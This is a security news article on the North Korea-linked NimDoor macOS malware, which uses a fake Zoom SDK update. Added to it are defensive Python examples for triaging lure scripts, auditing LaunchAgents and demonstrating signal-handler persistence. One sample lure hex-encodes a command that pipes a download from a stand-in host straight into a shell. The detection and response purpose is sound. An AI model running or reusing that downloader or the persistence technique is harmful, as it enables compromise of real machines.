
Fake Zoom SDK Update Delivers NimDoor Malware That Harvests Keychain Credentials on macOS

Security researchers have uncovered a sophisticated macOS malware campaign, dubbed NimDoor, in which North Korea-linked threat actors use a fake Zoom SDK update as the lure to steal sensitive data from cryptocurrency and Web3 organizations.

The malware, which has been active since at least April 2025, represents a significant evolution in North Korean cyber operations targeting the financial technology sector.

Social Engineering Through Trusted Platforms

The attack begins with an elaborate social engineering scheme where threat actors, likely affiliated with the Stardust Chollima group (also known as TA444, APT38, and BlueNoroff), impersonate trusted contacts on Telegram.

Victims receive invitations to schedule Zoom meetings through Calendly, followed by an email containing a malicious AppleScript disguised as a “Zoom SDK update.”

A telltale typo in one of the script's comments, "Zook" instead of "Zoom," gives analysts an easy identifier.

Once executed, the script kicks off a multi-stage infection that drops two Mach-O binaries: a C++ binary that decrypts the next-stage payload and drives the data theft, and a Nim-compiled "installer" that sets up persistence.
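A static triage pass over a suspected lure script, as an added example rather than SentinelOne's tooling or anything from the campaign itself: it flags the "Zook" typo, heavy blank-line padding and shell execution, and decodes any quoted hex literal so that a downloader hidden inside an encoded payload is still visible. The sample script, the padding size and the exact indicators are constructed assumptions for the example, not a signature for the real file.

```python
import re

# Constructed sample lure (an assumption, not the real file): a "Zook" comment,
# heavy blank-line padding, and a hex-encoded AppleScript that is decoded and
# run at execution time.
INNER = 'do shell script "curl -s https://update.example/sdk | sh"'
SAMPLE_LURE = (
    "-- Zook SDK update, please run to join the meeting\n"
    + "\n" * 200
    + 'set payload to "' + INNER.encode().hex() + '"\n'
    + 'run script (do shell script "echo " & payload & " | xxd -r -p")\n'
)

# quoted runs of hex at least 8 bytes long
HEX_LITERAL = re.compile(r'"([0-9a-fA-F]{16,})"')


def decode_hex_literals(text):
    """Decode every quoted hex literal in the script that yields valid UTF-8."""
    decoded = []
    for h in HEX_LITERAL.findall(text):
        if len(h) % 2:
            continue
        try:
            decoded.append(bytes.fromhex(h).decode("utf-8"))
        except ValueError:
            continue
    return decoded


def triage(script):
    """Collect the indicators for one script as a dict of findings."""
    lines = script.splitlines()
    blank = sum(1 for line in lines if not line.strip())
    decoded = decode_hex_literals(script)
    # look for execution indicators both in the script and in what it decodes to
    combined = script + "\n" + "\n".join(decoded)
    return {
        "zook_typo": re.search(r"\bZook\b", script) is not None,
        "blank_ratio": round(blank / max(len(lines), 1), 2),
        "padded": blank > 100 and blank / max(len(lines), 1) > 0.9,
        "decoded_payloads": decoded,
        "shell_exec": "do shell script" in combined,
        "downloader": re.search(r"\b(curl|wget)\b", combined) is not None,
    }


def verdict(findings):
    """Two or more disguise or execution indicators mark the script suspicious."""
    hits = sum(findings[k] for k in ("zook_typo", "padded", "shell_exec", "downloader"))
    return "suspicious" if hits >= 2 else "benign-looking"


if __name__ == "__main__":
    result = triage(SAMPLE_LURE)
    for key, value in result.items():
        print(f"{key}: {value}")
    print("verdict:", verdict(result))
```

Run it against the text of the attachment (`triage(open(path).read())`); the decoded payloads are the part worth reading, since the visible script is usually only a loader.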

The installer writes two further components, "GoogLe LLC" (a deliberate misspelling of Google's name) and "CoreKitAgent," and registers a LaunchAgent so they keep running.
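An audit of LaunchAgent property lists for the traits just described, as an added example (not SentinelOne's code or the campaign's): it parses each plist, records whether launchd autostarts the program, whether the binary lives in a user-writable location, whether its name matches one the campaign used, and whether the program is an interpreter hiding the real command in its arguments. The two sample plists, their labels and paths are constructed for the example; only the two executable names in the watchlist come from the write-up.

```python
import os
import plistlib

# Executable names taken from the NimDoor write-up: the impersonated vendor
# name and the agent binary. Matching is case-insensitive.
WATCHLIST = ("google llc", "corekitagent")
# A LaunchAgent whose program is an interpreter hides the real command in
# its arguments, so it deserves a look on its own.
INTERPRETERS = ("sh", "bash", "zsh", "osascript", "python3")

# Constructed sample plists (assumptions for the example, not the real files).
SUSPECT_PLIST = plistlib.dumps({
    "Label": "com.corekit.agent",
    "ProgramArguments": [
        "/Users/alice/Library/Application Support/CoreKitAgent/CoreKitAgent",
    ],
    "RunAtLoad": True,
    "KeepAlive": True,
})
BENIGN_PLIST = plistlib.dumps({
    "Label": "com.example.sync",
    "Program": "/Applications/Sync.app/Contents/MacOS/sync",
    "RunAtLoad": True,
})


def launch_agent_findings(plist_bytes, home="/Users/alice"):
    """Extract the traits of one LaunchAgent plist that matter for triage."""
    d = plistlib.loads(plist_bytes)
    args = list(d.get("ProgramArguments") or [])
    exe = args[0] if args else d.get("Program", "")
    return {
        "label": d.get("Label"),
        "executable": exe,
        # launchd starts it at login and/or restarts it whenever it exits
        "autostart": bool(d.get("RunAtLoad") or d.get("KeepAlive")),
        # the binary sits where the user, and therefore the malware, can write
        "user_writable": exe.startswith(home + "/Library/")
        or exe.startswith(("/tmp/", "/private/tmp/")),
        "watchlist_name": any(w in exe.lower() for w in WATCHLIST),
        "interpreter_wrapper": os.path.basename(exe) in INTERPRETERS,
    }


def is_suspicious(f):
    """Autostart from a user-writable path plus a campaign name or an
    interpreter wrapper is enough to escalate."""
    return f["autostart"] and f["user_writable"] and (
        f["watchlist_name"] or f["interpreter_wrapper"]
    )


def audit_directory(path):
    """Yield (filename, findings) for each plist in a LaunchAgents directory."""
    home = os.path.expanduser("~")
    for name in sorted(os.listdir(path)):
        if name.endswith(".plist"):
            with open(os.path.join(path, name), "rb") as fh:
                yield name, launch_agent_findings(fh.read(), home)


if __name__ == "__main__":
    for sample in (SUSPECT_PLIST, BENIGN_PLIST):
        f = launch_agent_findings(sample)
        print(f["label"], "->", "SUSPICIOUS" if is_suspicious(f) else "ok")
    agents = os.path.expanduser("~/Library/LaunchAgents")
    if os.path.isdir(agents):
        for name, f in audit_directory(agents):
            print(name, "->", "SUSPICIOUS" if is_suspicious(f) else "ok")
```

On a live Mac the loop at the bottom walks the current user's LaunchAgents directory; a hit is a starting point for checking the binary's code signature and hash, not a verdict by itself.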

Advanced Technical Capabilities

NimDoor’s technical sophistication lies in its use of the Nim programming language, which is rarely employed in macOS malware.

That choice complicates analysis because Nim can execute functions at compile time, so developer code and Nim runtime code end up interleaved in the resulting binary and its control flow is much harder to recover with static analysis.

The malware uses process injection, which is uncommon on macOS, and talks to its command-and-control servers over TLS-encrypted WebSocket connections.

A particularly novel feature is NimDoor's persistence mechanism: CoreKitAgent installs handlers for SIGINT and SIGTERM, so an attempt to terminate the process with either signal runs a routine that reinstalls the malware's components, while the LaunchAgent brings it back after a reboot. SentinelOne says it has not previously seen signal-based persistence of this kind in macOS malware. For responders, the practical consequence is that a plain kill (SIGTERM) or Ctrl-C (SIGINT) makes things worse; unload the LaunchAgent first and end the process with SIGKILL, which cannot be handled.
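The signal behaviour described above, reduced to a runnable demonstration. This is an added example and not NimDoor's code: a stand-in child process registers SIGINT/SIGTERM handlers that append a line to a marker file (where the real agent rewrites its LaunchAgent and binaries) and keeps running; the parent shows that SIGTERM triggers the "reinstall" while SIGKILL, which cannot be caught, ends the process with the marker untouched. The marker file and timings are assumptions for the example.

```python
import os
import signal
import subprocess
import sys
import tempfile
import time

# Stand-in agent (added example, not NimDoor's code): the handler only
# appends to a marker file where the real agent rewrites its persistence.
AGENT_SOURCE = r'''
import signal, sys, time
marker = sys.argv[1]

def reinstall(signum, frame):
    # Triggered by SIGINT or SIGTERM: put "persistence" back and keep running.
    with open(marker, "a") as f:
        f.write("reinstalled after signal %d\n" % signum)

for s in (signal.SIGINT, signal.SIGTERM):
    signal.signal(s, reinstall)
with open(marker, "w") as f:
    f.write("installed\n")
while True:
    time.sleep(0.05)
'''


def _read(path):
    try:
        with open(path) as f:
            return f.read()
    except FileNotFoundError:
        return ""


def run_demo(signal_name):
    """Start the stand-in agent, send it the named signal ("SIGTERM",
    "SIGKILL", ...) and report whether it survived and whether its handler
    re-created persistence."""
    sig = getattr(signal, signal_name)
    content = ""
    with tempfile.TemporaryDirectory() as tmp:
        marker = os.path.join(tmp, "persistence.marker")
        proc = subprocess.Popen([sys.executable, "-c", AGENT_SOURCE, marker])
        try:
            # the agent registers its handlers before writing the marker,
            # so once "installed" is visible the handlers are in place
            deadline = time.time() + 10
            while not _read(marker).startswith("installed") and time.time() < deadline:
                time.sleep(0.05)
            proc.send_signal(sig)
            try:
                proc.wait(timeout=1.0)  # returns only if the signal ended the process
                survived = False
            except subprocess.TimeoutExpired:
                survived = True
            content = _read(marker)
        finally:
            try:
                proc.kill()
            except ProcessLookupError:
                pass
            proc.wait()
    return {"survived": survived, "reinstalled": "reinstalled" in content, "marker": content}


if __name__ == "__main__":
    for name in ("SIGTERM", "SIGKILL"):
        print(name, run_demo(name))
```

The same split applies to `launchctl` and Activity Monitor, which send SIGTERM by default; `kill -9` is what actually stops a handler-protected process, and the LaunchAgent plist and binaries have to be gone before that or launchd simply starts it again.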

The malware beacons every 30 seconds to hardcoded C2 servers via hex-encoded AppleScript, sending lists of running processes and executing any script the server returns, which gives the operators a lightweight backdoor.

Targeting Cryptocurrency Infrastructure

The data theft is broad: Keychain credentials; browser data from Chrome, Firefox, Brave, Arc, and Edge; and Telegram databases, which may hold cryptocurrency wallet information.

This focus aligns with North Korea’s broader strategy of generating revenue through cryptocurrency theft to circumvent international sanctions.

SentinelOne’s identification of NimDoor underscores the evolving threat landscape facing Web3 and cryptocurrency organizations.

The campaign’s sophistication, including the use of legitimate Zoom meetings as distractions during compromise, demonstrates the advanced tactics employed by state-sponsored threat actors.

Security professionals recommend treating unsolicited "software updates" with suspicion, especially ones that arrive through informal channels such as chat or email rather than through the vendor's own update mechanism.


Priya
